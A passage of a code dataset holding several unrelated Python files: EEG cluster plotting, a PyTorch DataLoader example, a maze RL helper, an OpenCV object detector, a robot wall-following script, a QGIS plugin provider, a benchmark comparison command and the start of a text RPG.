ax[1].scatter(X3[n, 1], X3[n, 2], color='orange', label=\"Healthy Control\")\n\n ax[2].set_title('PC 0 and 2')\n n = np.where(Y_out == 0)\n ax[2].scatter(X3[n, 0], X3[n, 2], color='blue', label=\"Non-Recovered Patients\")\n n = np.where(Y_out == 1)\n ax[2].scatter(X3[n, 0], X3[n, 2], color='green', label=\"Non-Recovered CMD\")\n n = np.where(Y_out == 2)\n ax[2].scatter(X3[n, 0], X3[n, 2], color='red', label=\"Recovered Patients\")\n n = np.where(Y_out == 3)\n ax[2].scatter(X3[n, 0], X3[n, 2], color='orange', label=\"Healthy Control\")\n\n plt.legend(loc='lower right')\n pdf.savefig(fig)\n plt.close()\n\n\ndef plot_clustered_pca(pdf,X3,Y_out,P,k):\n # visualize in 3D\n fig = plt.figure(figsize=(6,6))\n ax = Axes3D(fig)\n n = np.where(Y_out==0)[0]\n ax.scatter(X3[n, 0], X3[n, 1],X3[n, 2],marker='o',c=P[n],label=\"Non-Recovered Patients\")\n n= np.where(Y_out==1)[0]\n ax.scatter(X3[n, 0], X3[n, 1],X3[n, 2],marker='x',c=P[n],label=\"Non-Recovered CMD \")\n n = np.where(Y_out == 2)[0]\n ax.scatter(X3[n, 0], X3[n, 1], X3[n, 2],marker='.', c=P[n], label=\"Recovered Patients\")\n n = np.where(Y_out == 3)[0]\n ax.scatter(X3[n, 0], X3[n, 1], X3[n, 2],marker='v', c=P[n], label=\"Healthy controls\")\n plt.title('{}_Clusters_allPart_wholeBrain_alpha'.format(str(k)))\n plt.legend(loc='lower right')\n pdf.savefig(fig)\n plt.close()\n\n fig, ax = plt.subplots(1, 3, figsize=(12, 6))\n fig.suptitle('{}_Clusters_allPart_wholeBrain_alpha'.format(str(k)), size=16)\n\n ax[0].set_title('PC 0 and 1')\n n = np.where(Y_out == 0)[0]\n ax[0].scatter(X3[n, 0], X3[n, 1], marker='o', c=P[n], label=\"Non-Recovered Patients\")\n n = np.where(Y_out == 1)[0]\n ax[0].scatter(X3[n, 0], X3[n, 1], marker='x', c=P[n], label=\"Non-Recovered CMD \")\n n = np.where(Y_out == 2)[0]\n ax[0].scatter(X3[n, 0], X3[n, 1], marker='.', c=P[n], label=\"Recovered Patients\")\n n = np.where(Y_out == 3)[0]\n ax[0].scatter(X3[n, 0], X3[n, 1], marker='v', c=P[n], label=\"Healthy controls\")\n\n ax[1].set_title('PC 1 and 2')\n n = np.where(Y_out==0)[0]\n ax[1].scatter(X3[n, 1],X3[n, 2],marker='o',c=P[n],label=\"Non-Recovered Patients\")\n n= np.where(Y_out==1)[0]\n ax[1].scatter(X3[n, 
1],X3[n, 2],marker='x',c=P[n],label=\"Non-Recovered CMD \")\n n = np.where(Y_out == 2)[0]\n ax[1].scatter(X3[n, 1], X3[n, 2],marker='.', c=P[n], label=\"Recovered Patients\")\n n = np.where(Y_out == 3)[0]\n ax[1].scatter(X3[n, 1], X3[n, 2],marker='v', c=P[n], label=\"Healthy controls\")\n\n ax[2].set_title('PC 0 and 2')\n n = np.where(Y_out==0)[0]\n ax[2].scatter(X3[n, 0], X3[n, 2], marker='o',c=P[n],label=\"Non-Recovered Patients\")\n n= np.where(Y_out==1)[0]\n ax[2].scatter(X3[n, 0], X3[n, 2], marker='x',c=P[n],label=\"Non-Recovered CMD \")\n n = np.where(Y_out == 2)[0]\n ax[2].scatter(X3[n, 0], X3[n, 2], marker='.', c=P[n], label=\"Recovered Patients\")\n n = np.where(Y_out == 3)[0]\n ax[2].scatter(X3[n, 0], X3[n, 2], marker='v', c=P[n], label=\"Healthy controls\")\n\n plt.legend(loc='lower right')\n pdf.savefig(fig)\n plt.close()\n\n\n\n\ndef plot_explained_variance(pdf,pca):\n # PLot explained Variance\n fig = plt.figure()\n plt.plot(np.cumsum(pca.explained_variance_ratio_))\n plt.xlabel('number of components')\n plt.ylabel('cumulative explained variance')\n plt.title('Explained_Variance_allPart_wholeBrain_alpha')\n pdf.savefig(fig)\n plt.close()\n\n\ndef plot_pie_and_distribution(pdf,part,part_cluster,k):\n fig, ax = plt.subplots(1, 2, figsize=(12, 6))\n fig.suptitle('Part {}; {}_Clusters_wholeBrain_alpha'.format(part, k), size=16)\n\n ax[0].plot(part_cluster)\n ax[0].set_ylim(0, k - 1)\n ax[0].set_title('Part {}; {}_Clusters_wholeBrain_alpha'.format(part, k))\n ax[0].set_ylabel('cluaster_Number')\n ax[0].set_xlabel('time')\n\n piedata = []\n clusternames = []\n for i in range(k):\n piedata.append(list(part_cluster).count(i))\n clusternames.append('cluster ' + str(i))\n\n ax[1].pie(piedata, labels=clusternames, autopct='%1.1f%%', startangle=90)\n pdf.savefig(fig)\n plt.close()\n\ndef plot_group_TPM(P, Y_out, k, pdf):\n P_nonr = P[Y_out == 0]\n P_ncmd = P[Y_out == 1]\n P_reco = P[Y_out == 2]\n P_heal = P[Y_out == 3]\n\n\n TPM_nonr = prop.get_transition_matrix(P_nonr,k)\n TPM_ncmd = prop.get_transition_matrix(P_ncmd,k)\n TPM_reco = prop.get_transition_matrix(P_reco,k)\n TPM_heal = prop.get_transition_matrix(P_heal,k)\n\n f, (ax1, ax2, ax3, ax4) = plt.subplots(1, 4, figsize=(12,3))\n g1 = sns.heatmap(TPM_heal, annot=True,cbar=False, ax = ax1, fmt='.1g')\n g1.set_title('Healthy')\n g2 = sns.heatmap(TPM_reco, annot=True,cbar=False, ax = ax2, fmt='.1g')\n g2.set_title('Recovered')\n g3 = sns.heatmap(TPM_nonr, annot=True,cbar=False, ax= ax3, fmt='.1g')\n g3.set_title('Non recovered')\n g4 = sns.heatmap(TPM_ncmd, annot=True,cbar=False, ax= ax4, fmt='.1g')\n g4.set_title('Non recovered CMD')\n pdf.savefig(f)\n plt.close()\n\ndef plot_group_averaged_TPM(AllPart, P, Y_out, k, pdf, data):\n\n P_nonr = np.empty((len(AllPart[\"Part_nonr\"]),k,k))\n P_ncmd = np.empty((len(AllPart[\"Part_ncmd\"]),k,k))\n P_reco = np.empty((len(AllPart[\"Part_reco\"]),k,k))\n P_heal = np.empty((len(AllPart[\"Part_heal\"]),k,k))\n\n for c,part in enumerate(AllPart[\"Part_heal\"]):\n part_cluster = P[data['ID'] == part]\n P_heal[c,:,:] = prop.get_transition_matrix(part_cluster, k)\n\n for c,part in enumerate(AllPart[\"Part_reco\"]):\n part_cluster = P[data['ID'] == part]\n P_reco[c,:,:] = prop.get_transition_matrix(part_cluster, k)\n\n for c,part in enumerate(AllPart[\"Part_nonr\"]):\n part_cluster = P[data['ID'] == part]\n P_nonr[c,:,:] = prop.get_transition_matrix(part_cluster, k)\n\n for c,part in enumerate(AllPart[\"Part_ncmd\"]):\n part_cluster = P[data['ID'] == part]\n P_ncmd[c,:,:] = 
prop.get_transition_matrix(part_cluster, k)\n\n TPM_heal = np.mean(P_heal,axis=0)\n TPM_reco = np.mean(P_reco,axis=0)\n TPM_nonr = np.mean(P_nonr,axis=0)\n TPM_ncmd = np.mean(P_ncmd,axis=0)\n\n f, (ax1, ax2, ax3, ax4) = plt.subplots(1, 4, figsize=(12,3))\n g1 = sns.heatmap(TPM_heal, annot=True,cbar=False, ax = ax1, fmt='.1g')\n g1.set_title('Healthy')\n g2 = sns.heatmap(TPM_reco, annot=True,cbar=False, ax = ax2, fmt='.1g')\n g2.set_title('Recovered')\n g3 = sns.heatmap(TPM_nonr, annot=True,cbar=False, ax= ax3, fmt='.1g')\n g3.set_title('Non recovered')\n g4 = sns.heatmap(TPM_ncmd, annot=True,cbar=False, ax= ax4, fmt='.1g')\n g4.set_title('Non recovered CMD')\n pdf.savefig(f)\n plt.close()\n","sub_path":"FC_Clustering_DOC/helper_functions/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":9651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"31442450","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 7 21:19:57 2021\n\n@author: 11200\n\"\"\"\n\n#使用Dataset 和 DataLoader\n\nimport torch\nimport numpy as np\nfrom torch.utils.data import Dataset\nfrom torch.utils.data import DataLoader\n\nclass DiabetesDataset(Dataset):\n def __init__(self,filepath):\n xy=np.loadtxt(filepath,delimiter=',',dtype=np.float32)\n #print(xy.shape) #(759, 9)\n #获得数据的行数\n self.len=xy.shape[0]\n self.x_data=torch.from_numpy(xy[:,:-1])\n self.y_data=torch.from_numpy(xy[:,[-1]])\n \n def __getitem__(self, index):\n return self.x_data[index],self.y_data[index]\n \n def __len__(self):\n return self.len\n\n\n\nclass Model(torch.nn.Module):\n def __init__(self):\n super(Model,self).__init__()\n self.linear1=torch.nn.Linear(8, 4)\n self.linear2=torch.nn.Linear(4, 2)\n self.linear3=torch.nn.Linear(2, 1)\n self.sigmoid=torch.nn.Sigmoid()\n def forward(self,x):\n x=self.sigmoid(self.linear1(x))\n x=self.sigmoid(self.linear2(x))\n x=self.sigmoid(self.linear3(x))\n return x\n\nif __name__ == '__main__':\n filepath=\"diabetes.csv.gz\"\n \n dataset=DiabetesDataset(filepath)\n \n\n train_loader=DataLoader(dataset=dataset,\n batch_size=32,\n shuffle=True,\n num_workers=2)\n \n model=Model()\n criterion=torch.nn.BCELoss(size_average=True)\n optimizer=torch.optim.SGD(model.parameters(), lr=0.01)\n \n Epoch=100\n for epoch in range(Epoch):\n cost=0.0\n for idx,data in enumerate(train_loader):\n inputs,targets=data\n\n outputs=model(inputs)\n \n loss=criterion(outputs,targets)\n \n \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n cost+=loss.item()\n \n print(epoch,cost)\n \n\n \n \n \n \n \n \n \n \n \n \n \n \n","sub_path":"test/09DatasetAndDataLoader_01.py","file_name":"09DatasetAndDataLoader_01.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"297356604","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.12-intel/egg/sample/maze/maze_helper.py\n# Compiled at: 2016-10-26 09:22:48\nfrom kyoka.policy.greedy_policy import GreedyPolicy\n\nclass MazeHelper:\n\n @classmethod\n def visualize_maze(self, maze):\n return ('\\n').join(maze)\n\n @classmethod\n def measure_performance(self, domain, value_function, step_limit=10000):\n policy = GreedyPolicy()\n state = domain.generate_initial_state()\n step_counter = 0\n while not domain.is_terminal_state(state):\n action = policy.choose_action(domain, 
value_function, state)\n state = domain.transit_state(state, action)\n step_counter += 1\n if step_counter >= step_limit:\n break\n\n return step_counter\n\n @classmethod\n def visualize_policy(self, domain, value_function):\n icon_map = {domain.UP: '^', domain.DOWN: 'v', domain.RIGHT: '>', domain.LEFT: '<', -1: '-', -2: 'G'}\n actions = self.__find_best_actions_on_each_cell(domain, value_function)\n flg2icon = lambda flg: icon_map[flg]\n visualized_actions = [ [ flg2icon(flg) for flg in line ] for line in actions ]\n return self.visualize_maze([ ('').join(line) for line in visualized_actions ])\n\n @classmethod\n def __find_best_actions_on_each_cell(self, domain, value_function):\n height, width = domain.get_maze_shape()\n goal_r, goal_c = domain.generate_terminal_state()\n curry = lambda row, col: self.__find_single_best_action(domain, value_function, row, col)\n maze_with_answer = [ [ curry(row, col) for col in range(width) ] for row in range(height) ]\n maze_with_answer[goal_r][goal_c] = -2\n return maze_with_answer\n\n @classmethod\n def __find_single_best_action(self, domain, value_function, row, col):\n state = (row, col)\n actions = domain.generate_possible_actions(state)\n values = [ value_function.calculate_value(state, action) for action in actions ]\n best_actions = [ act for act, val in zip(actions, values) if val == max(values) ]\n if len(best_actions) == 1:\n return best_actions[0]\n else:\n return -1","sub_path":"pycfiles/kyoka-0.2.1-py2.7/maze_helper.py","file_name":"maze_helper.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"448272746","text":"#!/usr/bin/env python3\n\n# Day 15: Product of Array Except Self\n#\n# Given an array nums of n integers where n > 1, return an array output such\n# that output[i] is equal to the product of all the elements of nums except\n# nums[i].\n# Constraint: It's guaranteed that the product of the elements of any prefix or\n# suffix of the array (including the whole array) fits in a 32 bit integer.\n# Note: Please solve it without division and in O(n).\n# Follow up:\n# - Could you solve it with constant space complexity? 
(The output array does\n# not count as extra space for the purpose of space complexity analysis.)\n\nclass Solution:\n def productExceptSelf(self, nums: [int]) -> [int]:\n output = [1] + [0 for _ in nums[1:]]\n # left to right\n for i in range(1, len(nums)):\n output[i] = output[i - 1] * nums[i - 1]\n # right to left\n product_on_right = 1\n for i in range(len(nums)-1, -1, -1):\n output[i] *= product_on_right\n product_on_right *= nums[i]\n return output\n\n# Test\nassert Solution().productExceptSelf([1,2,3,4]) == [24,12,8,6]\n","sub_path":"2020-04-month-long-challenge/day15.py","file_name":"day15.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"609366549","text":"import cv2\r\nimport numpy as np\r\ndef detectImage(filename):\r\n thres = 0.45 # Threshold to detect object\r\n img = cv2.imread(filename)\r\n\r\n\r\n classNames= []\r\n classFile = 'coco.names'\r\n with open(classFile,'rt') as f:\r\n classNames = f.read().rstrip('\\n').split('\\n')\r\n\r\n configPath = 'ssd_mobilenet_v3_large_coco_2020_01_14.pbtxt'\r\n weightsPath = 'frozen_inference_graph.pb'\r\n\r\n net = cv2.dnn_DetectionModel(weightsPath,configPath)\r\n net.setInputSize(320,320)\r\n net.setInputScale(1.0/ 127.5)\r\n net.setInputMean((127.5, 127.5, 127.5))\r\n net.setInputSwapRB(True)\r\n\r\n #while True:\r\n #success,img = cap.read()\r\n classIds, confs, bbox = net.detect(img,confThreshold=thres)\r\n print(classIds,bbox)\r\n\r\n COLORS = np.random.uniform(0, 255, size=(len(classNames), 3))\r\n #if len(classIds) != 0:\r\n for classId, confidence,box in zip(classIds.flatten(),confs.flatten(),bbox):\r\n # cv2.rectangle(img,box,color=(0,255,0),thickness=2)\r\n # cv2.putText(img,classNames[classId-1],(box[0],box[1]+30),\r\n # cv2.FONT_HERSHEY_COMPLEX,1,(0,255,0),2)\r\n # cv2.putText(img,str(round(confidence*100,2)),(box[0],box[1]-10),\r\n # cv2.FONT_HERSHEY_COMPLEX,1,(0,255,0),2)\r\n\r\n\r\n (startX, startY, endX, endY) = box.astype(\"int\")\r\n # display the prediction\r\n label = \"{}: {:.2f}%\".format(classNames[classId-1], confidence * 100)\r\n cv2.rectangle(img,box ,COLORS[classId-1], 2)\r\n y = startY - 15 if startY - 15 > 15 else startY + 15\r\n cv2.putText(img, label, (startX, y),\r\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, COLORS[classId-1], 2)\r\n\r\n cv2.imwrite('ImgToSend/img0.jpg', img)\r\n #cv2.imshow(\"Output\",img)\r\n #cv2.waitKey(0)","sub_path":"ImageDetection.py","file_name":"ImageDetection.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"479019715","text":"# Example code for IMRT100 robot project\n\n\n# Import some modules that we need\nimport imrt_robot_serial\nimport signal\nimport time\nimport sys\nimport random\n\nLEFT = -1\nRIGHT = 1\nFORWARDS = 1\nBACKWARDS = -1\nDRIVING_SPEED = 200\nSTOP_DISTANCE = 35\nTURN_SPEED_RIGHT = 180\nTURN_SPEED_LEFT = 100\nTURN_SPEED_BIG = 180\n\n\ndef stop_robot(duration):\n\n iterations = int(duration * 10)\n \n for i in range(iterations):\n motor_serial.send_command(0, 0)\n time.sleep(0.10)\n\n\n\ndef drive_robot(direction, duration):\n \n speed = DRIVING_SPEED * direction\n iterations = int(duration * 10)\n\n for i in range(iterations):\n motor_serial.send_command(speed, speed)\n time.sleep(0.10)\n\n\n\ndef turn_robot_90_degrees_right():\n\n direction = 1\n iterations = 1\n \n for i in range(iterations):\n motor_serial.send_command(TURN_SPEED_RIGHT * direction, -TURN_SPEED_RIGHT * 
direction)\n time.sleep(0.1)\n\ndef turn_robot_mange_degrees_right():\n\n direction = 1\n iterations = 8\n \n for i in range(iterations):\n motor_serial.send_command(TURN_SPEED_BIG * direction, -TURN_SPEED_BIG * direction)\n time.sleep(0.1)\n\n\ndef turn_robot_90_degrees_left():\n\n direction = -1\n iterations = 1\n \n for i in range(iterations):\n motor_serial.send_command(TURN_SPEED_LEFT * direction, -TURN_SPEED_LEFT* direction)\n time.sleep(0.1)\n\n\n\n# We want our program to send commands at 10 Hz (10 commands per second)\nexecution_frequency = 10 #Hz\nexecution_period = 1. / execution_frequency #seconds\n\n\n# Create motor serial object\nmotor_serial = imrt_robot_serial.IMRTRobotSerial()\n\n\n# Open serial port. Exit if serial port cannot be opened\ntry:\n motor_serial.connect(\"/dev/ttyACM0\")\nexcept:\n print(\"Could not open port. Is your robot connected?\\nExiting program\")\n sys.exit()\n\n \n# Start serial receive thread\nmotor_serial.run()\n\n\n# Now we will enter a loop that will keep looping until the program terminates\n# The motor_serial object will inform us when it's time to exit the program\n# (say if the program is terminated by the user)\nprint(\"Entering loop. Ctrl+c to terminate\")\nwhile not motor_serial.shutdown_now :\n\n\n ###############################################################\n # This is the start of our loop. Your code goes below. #\n # #\n # An example is provided to give you a starting point #\n # In this example we get the distance readings from each of #\n # the two distance sensors. Then we multiply each reading #\n # with a constant gain and use the two resulting numbers #\n # as commands for each of the two motors. #\n # ________________________________________________________ #\n # | | #\n # V #\n # V #\n ###############################################################\n\n\n\n\n\n\n # Get and print readings from distance sensors\n dist_1 = motor_serial.get_dist_1()\n dist_2 = motor_serial.get_dist_2()\n dist_3 = motor_serial.get_dist_3()\n dist_4 = motor_serial.get_dist_4()\n\n print(\"Høyre bak:\", dist_1, \"Høyre skrå:\", dist_2, \"Høyre foran:\", dist_3,\"Midt foran:\", dist_4)\n \n if dist_3 == 255 and dist_2 < 30 and dist_1 < 30:\n print(\"Feilretting\")\n turn_robot_90_degrees_left()\n dist_3 = motor_serial.get_dist_3()\n\n if dist_4 < 25: \n turn_robot_90_degrees_left()\n print(\"Justering foran\")\n time.sleep(0.1)\n \n elif dist_2 < 12 or dist_3 < 5:\n turn_robot_90_degrees_left()\n print(\"Justering vegg venstre\")\n time.sleep(0.10)\n \n elif dist_3 > 50 and dist_1 < 30:\n drive_robot(FORWARDS, 0.5)\n turn_robot_mange_degrees_right()\n drive_robot(FORWARDS, 1.0)\n print(\"Skarp sving, avstand\", dist_3)\n \n dist_3 = motor_serial.get_dist_3()\n if dist_3 > 60:\n drive_robot(FORWARDS, 0.8)\n turn_robot_mange_degrees_right()\n drive_robot(FORWARDS, 0.8)\n print(\"Skarp sving 2, avstand\", dist_3)\n else:\n drive_robot(FORWARDS, 0.1)\n\n elif dist_3 > 25 and dist_1 > 25 and dist_4 > 30 and dist_2 > 40:\n turn_robot_90_degrees_right()\n turn_robot_90_degrees_right()\n turn_robot_90_degrees_right()\n fortsett = True\n gi_deg = 0\n while(fortsett):\n gi_deg += 1\n drive_robot(FORWARDS, 0.2)\n if gi_deg % 4 == 0:\n turn_robot_90_degrees_right()\n dist_4 = motor_serial.get_dist_4()\n dist_2 = motor_serial.get_dist_2()\n dist_3 = motor_serial.get_dist_3()\n print(\"FINN VEGG\", gi_deg, dist_4)\n if dist_4 < 30 or dist_3 < 25 or dist_2 < 25 or gi_deg > 16:\n print(\"Gi deg\")\n fortsett = False\n \n elif dist_3 > (dist_1) or dist_3 > 50:\n 
turn_robot_90_degrees_right()\n drive_robot(FORWARDS, 0.1)\n print(\"Liten justering høyre: \", dist_3)\n\n elif dist_1 > (dist_3):\n turn_robot_90_degrees_left()\n drive_robot(FORWARDS, 0.1)\n print(\"Venstre\")\n \n \n else:\n drive_robot(FORWARDS, 0.1)\n\n ###############################################################\n # A #\n # A #\n # |_________________________________________________________| #\n # #\n # This is the end of our loop, #\n # execution continus at the start of our loop #\n ###############################################################\n ###############################################################\n '''\n elif dist_3 > 25 and dist_1 > 25 and dist_4 > 30 and dist_2 > 40:\n turn_robot_90_degrees_right()\n turn_robot_90_degrees_right()\n turn_robot_90_degrees_right()\n fortsett = True\n gi_deg = 0\n while(fortsett):\n gi_deg += 1\n drive_robot(FORWARDS, 0.05)\n if gi_deg % 4 == 0:\n turn_robot_90_degrees_right()\n dist_4 = motor_serial.get_dist_4()\n dist_2 = motor_serial.get_dist_2()\n dist_3 = motor_serial.get_dist_3()\n print(\"FINN VEGG\", gi_deg, dist_4)\n if dist_4 < 30 or dist_3 < 25 or dist_2 < 25 or gi_deg > 16:\n print(\"Gi deg\")\n fortsett = False\n '''\n\n\n\n\n# motor_serial has told us that its time to exit\n# we have now exited the loop\n# It's only polite to say goodbye\nprint(\"Goodbye\")\n","sub_path":"python/raspi/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"243641640","text":"import heapq\n\n#It will be minimum heap implementation in python\nheap = [4, 7, 3, -2, 1, 0]\nnum = [4, 7, 3, -2, 1, 0]\nheap_data = []\n# print(heap)\nheapq.heapify(heap)\n# print(heap)\n\nfor value in num:\n heapq.heappush(heap_data, value)\n\n# print(heap_data)\n\nwhile heap_data:\n print(heapq.heappop(heap_data))","sub_path":"Heaps/Inbuilt_heap.py","file_name":"Inbuilt_heap.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"296713501","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n***************************************************************************\n ModelerAlgorithmProvider.py\n ---------------------\n Date : August 2012\n Copyright : (C) 2012 by Victor Olaya\n Email : volayaf at gmail dot com\n***************************************************************************\n* *\n* This program is free software; you can redistribute it and/or modify *\n* it under the terms of the GNU General Public License as published by *\n* the Free Software Foundation; either version 2 of the License, or *\n* (at your option) any later version. 
*\n* *\n***************************************************************************\n\"\"\"\n\n__author__ = 'Victor Olaya'\n__date__ = 'August 2012'\n__copyright__ = '(C) 2012, Victor Olaya'\n\n# This will get replaced with a git SHA1 when you do a git archive\n\n__revision__ = '$Format:%H$'\n\nimport os\n\nfrom PyQt4.QtGui import QIcon\n\nfrom processing.core.AlgorithmProvider import AlgorithmProvider\nfrom processing.core.ProcessingConfig import ProcessingConfig, Setting\nfrom processing.core.ProcessingLog import ProcessingLog\nfrom processing.modeler.ModelerUtils import ModelerUtils\nfrom processing.modeler.ModelerAlgorithm import ModelerAlgorithm\nfrom processing.modeler.WrongModelException import WrongModelException\nfrom processing.modeler.EditModelAction import EditModelAction\nfrom processing.modeler.CreateNewModelAction import CreateNewModelAction\nfrom processing.modeler.DeleteModelAction import DeleteModelAction\nfrom processing.modeler.AddModelFromFileAction import AddModelFromFileAction\nfrom processing.gui.GetScriptsAndModels import GetModelsAction\n\npluginPath = os.path.split(os.path.dirname(__file__))[0]\n\n\nclass ModelerAlgorithmProvider(AlgorithmProvider):\n\n def __init__(self):\n AlgorithmProvider.__init__(self)\n self.actions = [CreateNewModelAction(), AddModelFromFileAction(), GetModelsAction()]\n self.contextMenuActions = [EditModelAction(), DeleteModelAction()]\n\n def initializeSettings(self):\n AlgorithmProvider.initializeSettings(self)\n ProcessingConfig.addSetting(Setting(self.getDescription(),\n ModelerUtils.MODELS_FOLDER, self.tr('Models folder', 'ModelerAlgorithmProvider'),\n ModelerUtils.modelsFolder(), valuetype=Setting.FOLDER))\n\n def setAlgsList(self, algs):\n ModelerUtils.allAlgs = algs\n\n def modelsFolder(self):\n return ModelerUtils.modelsFolder()\n\n def getDescription(self):\n return self.tr('Models', 'ModelerAlgorithmProvider')\n\n def getName(self):\n return 'model'\n\n def getIcon(self):\n return QIcon(os.path.join(pluginPath, 'images', 'model.png'))\n\n def _loadAlgorithms(self):\n folder = ModelerUtils.modelsFolder()\n self.loadFromFolder(folder)\n\n def loadFromFolder(self, folder):\n if not os.path.exists(folder):\n return\n for path, subdirs, files in os.walk(folder):\n for descriptionFile in files:\n if descriptionFile.endswith('model'):\n try:\n fullpath = os.path.join(path, descriptionFile)\n alg = ModelerAlgorithm.fromFile(fullpath)\n if alg.name:\n alg.provider = self\n alg.descriptionFile = fullpath\n self.algs.append(alg)\n else:\n ProcessingLog.addToLog(ProcessingLog.LOG_ERROR,\n self.tr('Could not load model %s', 'ModelerAlgorithmProvider') % descriptionFile)\n except WrongModelException as e:\n ProcessingLog.addToLog(ProcessingLog.LOG_ERROR,\n self.tr('Could not load model %s\\n%s', 'ModelerAlgorithmProvider') % (descriptionFile, e.msg))\n","sub_path":"processing/modeler/ModelerAlgorithmProvider.py","file_name":"ModelerAlgorithmProvider.py","file_ext":"py","file_size_in_byte":4201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"343317279","text":"# -*- coding: utf-8 -*-\n# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nimport os\n\nimport six\n\nfrom . import Command\nfrom .run import Run\n\nfrom ..console import log, truncate_left, color_print\nfrom ..repo import get_repo\nfrom .. import results\nfrom .. 
import util\n\n\nclass Continuous(Command):\n @classmethod\n def setup_arguments(cls, subparsers):\n parser = subparsers.add_parser(\n \"continuous\", help=\n \"Run a side-by-side comparison of two commits for continuous \"\n \"integration.\")\n\n parser.add_argument(\n 'branch', nargs=1, default='master',\n help=\"\"\"The HEAD branch to test. This commit and its\n parent commit will be used as the two commits for\n comparison.\"\"\")\n parser.add_argument(\n '--factor', \"-f\", nargs='?', type=float, default=2.0,\n help=\"\"\"The factor above or below which a result is\n considered problematic. For example, with a factor of 2,\n if a benchmark gets twice as slow or twice as fast, it\n will be displayed in the results list.\"\"\")\n parser.add_argument(\n \"--bench\", \"-b\", type=str, nargs=\"*\",\n help=\"\"\"Regular expression(s) for benchmark to run. When\n not provided, all benchmarks are run.\"\"\")\n parser.add_argument(\n \"--machine-defaults\", action=\"store_true\",\n help=\"\"\"Use autogenerated defaults for the machine information,\n instead of using the .asv-machine.json file\"\"\")\n\n parser.set_defaults(func=cls.run_from_args)\n\n return parser\n\n @classmethod\n def run_from_conf_args(cls, conf, args):\n return cls.run(\n conf=conf, branch=args.branch[0], factor=args.factor,\n bench=args.bench, machine_defaults=args.machine_defaults\n )\n\n @classmethod\n def run(cls, conf, branch=\"master\", factor=2.0, bench=None,\n machine_defaults=False):\n repo = get_repo(conf)\n\n repo.checkout_remote_branch('origin', branch)\n head = repo.get_hash_from_head()\n\n repo.checkout_parent()\n parent = repo.get_hash_from_head()\n\n commit_hashes = [head, parent]\n run_objs = {}\n\n result = Run.run(\n conf, range_spec=commit_hashes, bench=bench,\n machine_defaults=machine_defaults, _returns=run_objs)\n if result:\n return result\n\n tabulated = []\n for commit_hash in commit_hashes:\n subtab = {}\n totals = {}\n for benchmark in run_objs['benchmarks']:\n subtab[benchmark] = 0.0\n totals[benchmark] = 0\n\n for env in run_objs['environments']:\n filename = results.get_filename(\n run_objs['machine_params']['machine'], commit_hash, env)\n filename = os.path.join(conf.results_dir, filename)\n result = results.Results.load(filename)\n\n for benchmark in run_objs['benchmarks']:\n timing = results.results.get(benchmark, None)\n if timing is not None:\n subtab[benchmark] += timing\n totals[benchmark] += 1\n\n for benchmark in run_objs['benchmarks']:\n subtab[benchmark] /= totals.get(benchmark, 1)\n\n tabulated.append(subtab)\n\n after, before = tabulated\n\n table = []\n slowed_down = False\n for name, benchmark in six.iteritems(run_objs['benchmarks']):\n change = after[name] / before[name]\n if change > factor or change < 1.0 / factor:\n table.append(\n (change, before[name], after[name], name, benchmark))\n if change > factor:\n slowed_down = True\n\n print()\n\n if not len(table):\n color_print(\"BENCHMARKS NOT SIGNIFICANTLY CHANGED.\\n\", 'green')\n return 0\n\n table.sort(reverse=True)\n\n color_print(\"SOME BENCHMARKS HAVE CHANGED SIGNIFICANTLY.\\n\", 'red')\n print()\n color_print(\n \"{0:40s} {1:>8} {2:>8} {3:>8}\\n\".format(\"BENCHMARK\", \"BEFORE\", \"AFTER\", \"FACTOR\"),\n 'blue')\n for change, before, after, name, benchmark in table:\n before_display = util.human_value(before, benchmark['unit'])\n after_display = util.human_value(after, benchmark['unit'])\n\n print(\"{0:40s} {1:>8} {2:>8} {3:.8f}x\".format(\n truncate_left(name, 40),\n before_display, after_display, change))\n\n 
color_print(\n \"SOME BENCHMARKS HAVE CHANGED SIGNIFICANTLY.\\n\", 'red')\n\n return slowed_down\n","sub_path":"asv/commands/continuous.py","file_name":"continuous.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"323669915","text":"import sys\nimport os\nimport time\nfrom character import *\nfrom monster import *\n\n\nclass Game:\n\n # CORE GAME LOOP\n def __init__(self):\n os.system('clear')\n self.setup()\n\n # RUNS WHILE PLAYER ALIVE AND AT LEAST ONE ENEMY REMAINS\n while self.player.hp > 0 and (self.monster or self.monster_pool or self.boss):\n\n # PRINT HEADER WITH PLAYER / MONSTER INFO\n os.system('clear')\n print('='*90)\n print(self.player)\n print('-'*90)\n print(self.monster.battlecry(), \"\\nA wild creature appears:\")\n print(self.monster)\n print('-'*90)\n\n #PLAYER TURN\n self.player_turn()\n print(' ')\n\n #MONSTER TURN\n self.monster_turn()\n print(' ')\n\n #CLEANUP\n self.cleanup()\n if not self.player.killed_a_monster:\n print('-'*90)\n input('End of turn. Press [Enter] to continue.')\n\n # IF PLAYER REMAINS\n if self.player.hp > 0:\n 